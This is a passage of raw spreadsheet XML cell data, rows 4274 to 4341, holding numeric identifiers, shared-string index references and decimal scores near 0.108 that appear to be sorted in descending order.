      <c r="E4274" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4274" s="2">
        <v>0.1085470085470085</v>
      </c>
    </row>
    <row r="4275" ht="15.75" customHeight="1">
      <c r="A4275" s="1">
        <v>11968.0</v>
      </c>
      <c r="B4275" s="2">
        <v>2.5710404E7</v>
      </c>
      <c r="C4275" s="2" t="s">
        <v>4067</v>
      </c>
      <c r="D4275" s="2">
        <v>1.0</v>
      </c>
      <c r="E4275" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4275" s="2">
        <v>0.1084656084656085</v>
      </c>
    </row>
    <row r="4276" ht="15.75" customHeight="1">
      <c r="A4276" s="1">
        <v>19073.0</v>
      </c>
      <c r="B4276" s="2">
        <v>5.4617133E7</v>
      </c>
      <c r="C4276" s="5" t="s">
        <v>4068</v>
      </c>
      <c r="D4276" s="2">
        <v>1.0</v>
      </c>
      <c r="E4276" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4276" s="2">
        <v>0.1084229390681004</v>
      </c>
    </row>
    <row r="4277" ht="15.75" customHeight="1">
      <c r="A4277" s="1">
        <v>623.0</v>
      </c>
      <c r="B4277" s="2">
        <v>1.9552718E7</v>
      </c>
      <c r="C4277" s="2" t="s">
        <v>4069</v>
      </c>
      <c r="D4277" s="2">
        <v>1.0</v>
      </c>
      <c r="E4277" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4277" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="4278" ht="15.75" customHeight="1">
      <c r="A4278" s="1">
        <v>10444.0</v>
      </c>
      <c r="B4278" s="2">
        <v>1.0450338E7</v>
      </c>
      <c r="C4278" s="2" t="s">
        <v>4070</v>
      </c>
      <c r="D4278" s="2">
        <v>1.0</v>
      </c>
      <c r="E4278" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4278" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="4279" ht="15.75" customHeight="1">
      <c r="A4279" s="1">
        <v>28996.0</v>
      </c>
      <c r="B4279" s="2">
        <v>2.9863736E7</v>
      </c>
      <c r="C4279" s="2" t="s">
        <v>4071</v>
      </c>
      <c r="D4279" s="2">
        <v>1.0</v>
      </c>
      <c r="E4279" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4279" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="4280" ht="15.75" customHeight="1">
      <c r="A4280" s="1">
        <v>31195.0</v>
      </c>
      <c r="B4280" s="2">
        <v>4921456.0</v>
      </c>
      <c r="C4280" s="2" t="s">
        <v>4072</v>
      </c>
      <c r="D4280" s="2">
        <v>1.0</v>
      </c>
      <c r="E4280" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4280" s="2">
        <v>0.1083333333333334</v>
      </c>
    </row>
    <row r="4281" ht="15.75" customHeight="1">
      <c r="A4281" s="1">
        <v>5238.0</v>
      </c>
      <c r="B4281" s="2">
        <v>4.501796E7</v>
      </c>
      <c r="C4281" s="2" t="s">
        <v>4073</v>
      </c>
      <c r="D4281" s="2">
        <v>1.0</v>
      </c>
      <c r="E4281" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4281" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="4282" ht="15.75" customHeight="1">
      <c r="A4282" s="1">
        <v>5076.0</v>
      </c>
      <c r="B4282" s="2">
        <v>4.442974E7</v>
      </c>
      <c r="C4282" s="2" t="s">
        <v>4074</v>
      </c>
      <c r="D4282" s="2">
        <v>1.0</v>
      </c>
      <c r="E4282" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4282" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="4283" ht="15.75" customHeight="1">
      <c r="A4283" s="1">
        <v>13719.0</v>
      </c>
      <c r="B4283" s="2">
        <v>3.6323839E7</v>
      </c>
      <c r="C4283" s="2" t="s">
        <v>4075</v>
      </c>
      <c r="D4283" s="2">
        <v>1.0</v>
      </c>
      <c r="E4283" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4283" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="4284" ht="15.75" customHeight="1">
      <c r="A4284" s="1">
        <v>26004.0</v>
      </c>
      <c r="B4284" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C4284" s="2" t="s">
        <v>4076</v>
      </c>
      <c r="D4284" s="2">
        <v>1.0</v>
      </c>
      <c r="E4284" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4284" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="4285" ht="15.75" customHeight="1">
      <c r="A4285" s="1">
        <v>6308.0</v>
      </c>
      <c r="B4285" s="2">
        <v>4.8241428E7</v>
      </c>
      <c r="C4285" s="2" t="s">
        <v>4077</v>
      </c>
      <c r="D4285" s="2">
        <v>1.0</v>
      </c>
      <c r="E4285" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4285" s="2">
        <v>0.1082862523540489</v>
      </c>
    </row>
    <row r="4286" ht="15.75" customHeight="1">
      <c r="A4286" s="1">
        <v>10382.0</v>
      </c>
      <c r="B4286" s="2">
        <v>8257992.0</v>
      </c>
      <c r="C4286" s="2" t="s">
        <v>4078</v>
      </c>
      <c r="D4286" s="2">
        <v>1.0</v>
      </c>
      <c r="E4286" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4286" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="4287" ht="15.75" customHeight="1">
      <c r="A4287" s="1">
        <v>10988.0</v>
      </c>
      <c r="B4287" s="2">
        <v>1.741629E7</v>
      </c>
      <c r="C4287" s="2" t="s">
        <v>4079</v>
      </c>
      <c r="D4287" s="2">
        <v>1.0</v>
      </c>
      <c r="E4287" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4287" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="4288" ht="15.75" customHeight="1">
      <c r="A4288" s="1">
        <v>11400.0</v>
      </c>
      <c r="B4288" s="2">
        <v>2.159419E7</v>
      </c>
      <c r="C4288" s="2" t="s">
        <v>4080</v>
      </c>
      <c r="D4288" s="2">
        <v>1.0</v>
      </c>
      <c r="E4288" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4288" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="4289" ht="15.75" customHeight="1">
      <c r="A4289" s="1">
        <v>17860.0</v>
      </c>
      <c r="B4289" s="2">
        <v>5.0991891E7</v>
      </c>
      <c r="C4289" s="2" t="s">
        <v>4081</v>
      </c>
      <c r="D4289" s="2">
        <v>1.0</v>
      </c>
      <c r="E4289" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4289" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="4290" ht="15.75" customHeight="1">
      <c r="A4290" s="1">
        <v>15.0</v>
      </c>
      <c r="B4290" s="2">
        <v>1.0327582E7</v>
      </c>
      <c r="C4290" s="2" t="s">
        <v>4082</v>
      </c>
      <c r="D4290" s="2">
        <v>1.0</v>
      </c>
      <c r="E4290" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4290" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4291" ht="15.75" customHeight="1">
      <c r="A4291" s="1">
        <v>416.0</v>
      </c>
      <c r="B4291" s="2">
        <v>1.6783456E7</v>
      </c>
      <c r="C4291" s="2" t="s">
        <v>4083</v>
      </c>
      <c r="D4291" s="2">
        <v>1.0</v>
      </c>
      <c r="E4291" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4291" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4292" ht="15.75" customHeight="1">
      <c r="A4292" s="1">
        <v>713.0</v>
      </c>
      <c r="B4292" s="2">
        <v>2.0613251E7</v>
      </c>
      <c r="C4292" s="2" t="s">
        <v>4084</v>
      </c>
      <c r="D4292" s="2">
        <v>1.0</v>
      </c>
      <c r="E4292" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4292" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4293" ht="15.75" customHeight="1">
      <c r="A4293" s="1">
        <v>895.0</v>
      </c>
      <c r="B4293" s="2">
        <v>2.2038794E7</v>
      </c>
      <c r="C4293" s="2" t="s">
        <v>4085</v>
      </c>
      <c r="D4293" s="2">
        <v>1.0</v>
      </c>
      <c r="E4293" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4293" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4294" ht="15.75" customHeight="1">
      <c r="A4294" s="1">
        <v>1126.0</v>
      </c>
      <c r="B4294" s="2">
        <v>2.4167867E7</v>
      </c>
      <c r="C4294" s="2" t="s">
        <v>4086</v>
      </c>
      <c r="D4294" s="2">
        <v>1.0</v>
      </c>
      <c r="E4294" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4294" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4295" ht="15.75" customHeight="1">
      <c r="A4295" s="1">
        <v>2024.0</v>
      </c>
      <c r="B4295" s="2">
        <v>3.0785514E7</v>
      </c>
      <c r="C4295" s="2" t="s">
        <v>4087</v>
      </c>
      <c r="D4295" s="2">
        <v>1.0</v>
      </c>
      <c r="E4295" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4295" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4296" ht="15.75" customHeight="1">
      <c r="A4296" s="1">
        <v>2657.0</v>
      </c>
      <c r="B4296" s="2">
        <v>3.4691478E7</v>
      </c>
      <c r="C4296" s="2" t="s">
        <v>4088</v>
      </c>
      <c r="D4296" s="2">
        <v>1.0</v>
      </c>
      <c r="E4296" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4296" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4297" ht="15.75" customHeight="1">
      <c r="A4297" s="1">
        <v>3056.0</v>
      </c>
      <c r="B4297" s="2">
        <v>3.6506302E7</v>
      </c>
      <c r="C4297" s="2" t="s">
        <v>4089</v>
      </c>
      <c r="D4297" s="2">
        <v>1.0</v>
      </c>
      <c r="E4297" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4297" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4298" ht="15.75" customHeight="1">
      <c r="A4298" s="1">
        <v>3609.0</v>
      </c>
      <c r="B4298" s="2">
        <v>3.9134637E7</v>
      </c>
      <c r="C4298" s="2" t="s">
        <v>4090</v>
      </c>
      <c r="D4298" s="2">
        <v>1.0</v>
      </c>
      <c r="E4298" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4298" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4299" ht="15.75" customHeight="1">
      <c r="A4299" s="1">
        <v>3900.0</v>
      </c>
      <c r="B4299" s="2">
        <v>4.0474451E7</v>
      </c>
      <c r="C4299" s="2" t="s">
        <v>4091</v>
      </c>
      <c r="D4299" s="2">
        <v>1.0</v>
      </c>
      <c r="E4299" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4299" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4300" ht="15.75" customHeight="1">
      <c r="A4300" s="1">
        <v>4945.0</v>
      </c>
      <c r="B4300" s="2">
        <v>4.403717E7</v>
      </c>
      <c r="C4300" s="2" t="s">
        <v>4092</v>
      </c>
      <c r="D4300" s="2">
        <v>1.0</v>
      </c>
      <c r="E4300" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4300" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4301" ht="15.75" customHeight="1">
      <c r="A4301" s="1">
        <v>5599.0</v>
      </c>
      <c r="B4301" s="2">
        <v>4.6136334E7</v>
      </c>
      <c r="C4301" s="2" t="s">
        <v>4093</v>
      </c>
      <c r="D4301" s="2">
        <v>1.0</v>
      </c>
      <c r="E4301" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4301" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4302" ht="15.75" customHeight="1">
      <c r="A4302" s="1">
        <v>6223.0</v>
      </c>
      <c r="B4302" s="2">
        <v>4.802478E7</v>
      </c>
      <c r="C4302" s="2" t="s">
        <v>4094</v>
      </c>
      <c r="D4302" s="2">
        <v>1.0</v>
      </c>
      <c r="E4302" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4302" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4303" ht="15.75" customHeight="1">
      <c r="A4303" s="1">
        <v>7173.0</v>
      </c>
      <c r="B4303" s="2">
        <v>5.053731E7</v>
      </c>
      <c r="C4303" s="2" t="s">
        <v>4095</v>
      </c>
      <c r="D4303" s="2">
        <v>1.0</v>
      </c>
      <c r="E4303" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4303" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4304" ht="15.75" customHeight="1">
      <c r="A4304" s="1">
        <v>7380.0</v>
      </c>
      <c r="B4304" s="2">
        <v>5.1061456E7</v>
      </c>
      <c r="C4304" s="2" t="s">
        <v>4096</v>
      </c>
      <c r="D4304" s="2">
        <v>1.0</v>
      </c>
      <c r="E4304" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4304" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4305" ht="15.75" customHeight="1">
      <c r="A4305" s="1">
        <v>7443.0</v>
      </c>
      <c r="B4305" s="2">
        <v>5.12178E7</v>
      </c>
      <c r="C4305" s="2" t="s">
        <v>4097</v>
      </c>
      <c r="D4305" s="2">
        <v>1.0</v>
      </c>
      <c r="E4305" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4305" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4306" ht="15.75" customHeight="1">
      <c r="A4306" s="1">
        <v>7456.0</v>
      </c>
      <c r="B4306" s="2">
        <v>5.1237956E7</v>
      </c>
      <c r="C4306" s="2" t="s">
        <v>4098</v>
      </c>
      <c r="D4306" s="2">
        <v>1.0</v>
      </c>
      <c r="E4306" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4306" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4307" ht="15.75" customHeight="1">
      <c r="A4307" s="1">
        <v>8085.0</v>
      </c>
      <c r="B4307" s="2">
        <v>5.3036331E7</v>
      </c>
      <c r="C4307" s="2" t="s">
        <v>4099</v>
      </c>
      <c r="D4307" s="2">
        <v>1.0</v>
      </c>
      <c r="E4307" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4307" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4308" ht="15.75" customHeight="1">
      <c r="A4308" s="1">
        <v>8360.0</v>
      </c>
      <c r="B4308" s="2">
        <v>5.3771888E7</v>
      </c>
      <c r="C4308" s="2" t="s">
        <v>4100</v>
      </c>
      <c r="D4308" s="2">
        <v>1.0</v>
      </c>
      <c r="E4308" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4308" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4309" ht="15.75" customHeight="1">
      <c r="A4309" s="1">
        <v>8512.0</v>
      </c>
      <c r="B4309" s="2">
        <v>5.4067421E7</v>
      </c>
      <c r="C4309" s="2" t="s">
        <v>4101</v>
      </c>
      <c r="D4309" s="2">
        <v>1.0</v>
      </c>
      <c r="E4309" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4309" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4310" ht="15.75" customHeight="1">
      <c r="A4310" s="1">
        <v>9115.0</v>
      </c>
      <c r="B4310" s="2">
        <v>5.5204723E7</v>
      </c>
      <c r="C4310" s="2" t="s">
        <v>4102</v>
      </c>
      <c r="D4310" s="2">
        <v>1.0</v>
      </c>
      <c r="E4310" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4310" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4311" ht="15.75" customHeight="1">
      <c r="A4311" s="1">
        <v>9334.0</v>
      </c>
      <c r="B4311" s="2">
        <v>5.5629446E7</v>
      </c>
      <c r="C4311" s="2" t="s">
        <v>4103</v>
      </c>
      <c r="D4311" s="2">
        <v>1.0</v>
      </c>
      <c r="E4311" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4311" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4312" ht="15.75" customHeight="1">
      <c r="A4312" s="1">
        <v>9391.0</v>
      </c>
      <c r="B4312" s="2">
        <v>5.5743421E7</v>
      </c>
      <c r="C4312" s="2" t="s">
        <v>4104</v>
      </c>
      <c r="D4312" s="2">
        <v>1.0</v>
      </c>
      <c r="E4312" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4312" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4313" ht="15.75" customHeight="1">
      <c r="A4313" s="1">
        <v>9700.0</v>
      </c>
      <c r="B4313" s="2">
        <v>5.6367707E7</v>
      </c>
      <c r="C4313" s="2" t="s">
        <v>4105</v>
      </c>
      <c r="D4313" s="2">
        <v>1.0</v>
      </c>
      <c r="E4313" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4313" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4314" ht="15.75" customHeight="1">
      <c r="A4314" s="1">
        <v>9863.0</v>
      </c>
      <c r="B4314" s="2">
        <v>5.6715695E7</v>
      </c>
      <c r="C4314" s="2" t="s">
        <v>4106</v>
      </c>
      <c r="D4314" s="2">
        <v>1.0</v>
      </c>
      <c r="E4314" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4314" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4315" ht="15.75" customHeight="1">
      <c r="A4315" s="1">
        <v>11366.0</v>
      </c>
      <c r="B4315" s="2">
        <v>2.1371768E7</v>
      </c>
      <c r="C4315" s="2" t="s">
        <v>4107</v>
      </c>
      <c r="D4315" s="2">
        <v>1.0</v>
      </c>
      <c r="E4315" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4315" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4316" ht="15.75" customHeight="1">
      <c r="A4316" s="1">
        <v>13077.0</v>
      </c>
      <c r="B4316" s="2">
        <v>3.3358101E7</v>
      </c>
      <c r="C4316" s="2" t="s">
        <v>4108</v>
      </c>
      <c r="D4316" s="2">
        <v>1.0</v>
      </c>
      <c r="E4316" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4316" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4317" ht="15.75" customHeight="1">
      <c r="A4317" s="1">
        <v>13167.0</v>
      </c>
      <c r="B4317" s="2">
        <v>3.3978465E7</v>
      </c>
      <c r="C4317" s="2" t="s">
        <v>4109</v>
      </c>
      <c r="D4317" s="2">
        <v>1.0</v>
      </c>
      <c r="E4317" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4317" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4318" ht="15.75" customHeight="1">
      <c r="A4318" s="1">
        <v>13207.0</v>
      </c>
      <c r="B4318" s="2">
        <v>3.4140722E7</v>
      </c>
      <c r="C4318" s="2" t="s">
        <v>4110</v>
      </c>
      <c r="D4318" s="2">
        <v>1.0</v>
      </c>
      <c r="E4318" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4318" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4319" ht="15.75" customHeight="1">
      <c r="A4319" s="1">
        <v>13216.0</v>
      </c>
      <c r="B4319" s="2">
        <v>3.4198659E7</v>
      </c>
      <c r="C4319" s="2" t="s">
        <v>4111</v>
      </c>
      <c r="D4319" s="2">
        <v>1.0</v>
      </c>
      <c r="E4319" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4319" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4320" ht="15.75" customHeight="1">
      <c r="A4320" s="1">
        <v>13518.0</v>
      </c>
      <c r="B4320" s="2">
        <v>3.5483859E7</v>
      </c>
      <c r="C4320" s="2" t="s">
        <v>4112</v>
      </c>
      <c r="D4320" s="2">
        <v>1.0</v>
      </c>
      <c r="E4320" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4320" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4321" ht="15.75" customHeight="1">
      <c r="A4321" s="1">
        <v>15186.0</v>
      </c>
      <c r="B4321" s="2">
        <v>4.2032957E7</v>
      </c>
      <c r="C4321" s="2" t="s">
        <v>4113</v>
      </c>
      <c r="D4321" s="2">
        <v>1.0</v>
      </c>
      <c r="E4321" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4321" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4322" ht="15.75" customHeight="1">
      <c r="A4322" s="1">
        <v>15665.0</v>
      </c>
      <c r="B4322" s="2">
        <v>4.3716244E7</v>
      </c>
      <c r="C4322" s="2" t="s">
        <v>4114</v>
      </c>
      <c r="D4322" s="2">
        <v>1.0</v>
      </c>
      <c r="E4322" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4322" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4323" ht="15.75" customHeight="1">
      <c r="A4323" s="1">
        <v>17069.0</v>
      </c>
      <c r="B4323" s="2">
        <v>4.8586803E7</v>
      </c>
      <c r="C4323" s="2" t="s">
        <v>4115</v>
      </c>
      <c r="D4323" s="2">
        <v>1.0</v>
      </c>
      <c r="E4323" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4323" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4324" ht="15.75" customHeight="1">
      <c r="A4324" s="1">
        <v>17128.0</v>
      </c>
      <c r="B4324" s="2">
        <v>4.8815266E7</v>
      </c>
      <c r="C4324" s="2" t="s">
        <v>4116</v>
      </c>
      <c r="D4324" s="2">
        <v>1.0</v>
      </c>
      <c r="E4324" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4324" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4325" ht="15.75" customHeight="1">
      <c r="A4325" s="1">
        <v>17981.0</v>
      </c>
      <c r="B4325" s="2">
        <v>5.1381785E7</v>
      </c>
      <c r="C4325" s="2" t="s">
        <v>4117</v>
      </c>
      <c r="D4325" s="2">
        <v>1.0</v>
      </c>
      <c r="E4325" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4325" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4326" ht="15.75" customHeight="1">
      <c r="A4326" s="1">
        <v>18084.0</v>
      </c>
      <c r="B4326" s="2">
        <v>5.1644619E7</v>
      </c>
      <c r="C4326" s="2" t="s">
        <v>4118</v>
      </c>
      <c r="D4326" s="2">
        <v>1.0</v>
      </c>
      <c r="E4326" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4326" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4327" ht="15.75" customHeight="1">
      <c r="A4327" s="1">
        <v>18957.0</v>
      </c>
      <c r="B4327" s="2">
        <v>5.435524E7</v>
      </c>
      <c r="C4327" s="2" t="s">
        <v>4119</v>
      </c>
      <c r="D4327" s="2">
        <v>1.0</v>
      </c>
      <c r="E4327" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4327" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4328" ht="15.75" customHeight="1">
      <c r="A4328" s="1">
        <v>19123.0</v>
      </c>
      <c r="B4328" s="2">
        <v>5.476084E7</v>
      </c>
      <c r="C4328" s="2" t="s">
        <v>4120</v>
      </c>
      <c r="D4328" s="2">
        <v>1.0</v>
      </c>
      <c r="E4328" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4328" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4329" ht="15.75" customHeight="1">
      <c r="A4329" s="1">
        <v>19178.0</v>
      </c>
      <c r="B4329" s="2">
        <v>5.4972328E7</v>
      </c>
      <c r="C4329" s="2" t="s">
        <v>4121</v>
      </c>
      <c r="D4329" s="2">
        <v>1.0</v>
      </c>
      <c r="E4329" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4329" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4330" ht="15.75" customHeight="1">
      <c r="A4330" s="1">
        <v>19560.0</v>
      </c>
      <c r="B4330" s="2">
        <v>5.608553E7</v>
      </c>
      <c r="C4330" s="2" t="s">
        <v>4122</v>
      </c>
      <c r="D4330" s="2">
        <v>1.0</v>
      </c>
      <c r="E4330" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4330" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4331" ht="15.75" customHeight="1">
      <c r="A4331" s="1">
        <v>21670.0</v>
      </c>
      <c r="B4331" s="2">
        <v>2.5016995E7</v>
      </c>
      <c r="C4331" s="2" t="s">
        <v>4123</v>
      </c>
      <c r="D4331" s="2">
        <v>1.0</v>
      </c>
      <c r="E4331" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4331" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4332" ht="15.75" customHeight="1">
      <c r="A4332" s="1">
        <v>22646.0</v>
      </c>
      <c r="B4332" s="2">
        <v>4.0821148E7</v>
      </c>
      <c r="C4332" s="2" t="s">
        <v>4124</v>
      </c>
      <c r="D4332" s="2">
        <v>1.0</v>
      </c>
      <c r="E4332" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4332" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4333" ht="15.75" customHeight="1">
      <c r="A4333" s="1">
        <v>23879.0</v>
      </c>
      <c r="B4333" s="2">
        <v>8364378.0</v>
      </c>
      <c r="C4333" s="2" t="s">
        <v>4125</v>
      </c>
      <c r="D4333" s="2">
        <v>1.0</v>
      </c>
      <c r="E4333" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4333" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4334" ht="15.75" customHeight="1">
      <c r="A4334" s="1">
        <v>28200.0</v>
      </c>
      <c r="B4334" s="2">
        <v>2.5016994E7</v>
      </c>
      <c r="C4334" s="2" t="s">
        <v>4123</v>
      </c>
      <c r="D4334" s="2">
        <v>1.0</v>
      </c>
      <c r="E4334" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4334" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4335" ht="15.75" customHeight="1">
      <c r="A4335" s="1">
        <v>28230.0</v>
      </c>
      <c r="B4335" s="2">
        <v>2.5138326E7</v>
      </c>
      <c r="C4335" s="2" t="s">
        <v>4126</v>
      </c>
      <c r="D4335" s="2">
        <v>1.0</v>
      </c>
      <c r="E4335" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4335" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4336" ht="15.75" customHeight="1">
      <c r="A4336" s="1">
        <v>28850.0</v>
      </c>
      <c r="B4336" s="2">
        <v>2.9012449E7</v>
      </c>
      <c r="C4336" s="2" t="s">
        <v>4127</v>
      </c>
      <c r="D4336" s="2">
        <v>1.0</v>
      </c>
      <c r="E4336" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4336" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4337" ht="15.75" customHeight="1">
      <c r="A4337" s="1">
        <v>29421.0</v>
      </c>
      <c r="B4337" s="2">
        <v>3.2189427E7</v>
      </c>
      <c r="C4337" s="2" t="s">
        <v>4128</v>
      </c>
      <c r="D4337" s="2">
        <v>1.0</v>
      </c>
      <c r="E4337" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4337" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4338" ht="15.75" customHeight="1">
      <c r="A4338" s="1">
        <v>29592.0</v>
      </c>
      <c r="B4338" s="2">
        <v>3.3532453E7</v>
      </c>
      <c r="C4338" s="2" t="s">
        <v>4129</v>
      </c>
      <c r="D4338" s="2">
        <v>1.0</v>
      </c>
      <c r="E4338" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4338" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4339" ht="15.75" customHeight="1">
      <c r="A4339" s="1">
        <v>30332.0</v>
      </c>
      <c r="B4339" s="2">
        <v>3.8138261E7</v>
      </c>
      <c r="C4339" s="2" t="s">
        <v>4130</v>
      </c>
      <c r="D4339" s="2">
        <v>1.0</v>
      </c>
      <c r="E4339" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4339" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="4340" ht="15.75" customHeight="1">
      <c r="A4340" s="1">
        <v>13519.0</v>
      </c>
      <c r="B4340" s="2">
        <v>3.5493065E7</v>
      </c>
      <c r="C4340" s="2" t="s">
        <v>4131</v>
      </c>
      <c r="D4340" s="2">
        <v>1.0</v>
      </c>
      <c r="E4340" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4340" s="2">
        <v>0.1081871345029239</v>
      </c>
    </row>
    <row r="4341" ht="15.75" customHeight="1">
      <c r="A4341" s="1">
        <v>2980.0</v>
      </c>
      <c r="B4341" s="2">
        <v>3.6153695E7</v>
      </c>
      <c r="C4341" s="2" t="s">
        <v>4132</v>
      </c>
      <c r="D4341" s="2">
        <v>1.0</v>
      </c>
      <c r="E4341" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4341" s="2">
        <v>0.1081349206349206</v>
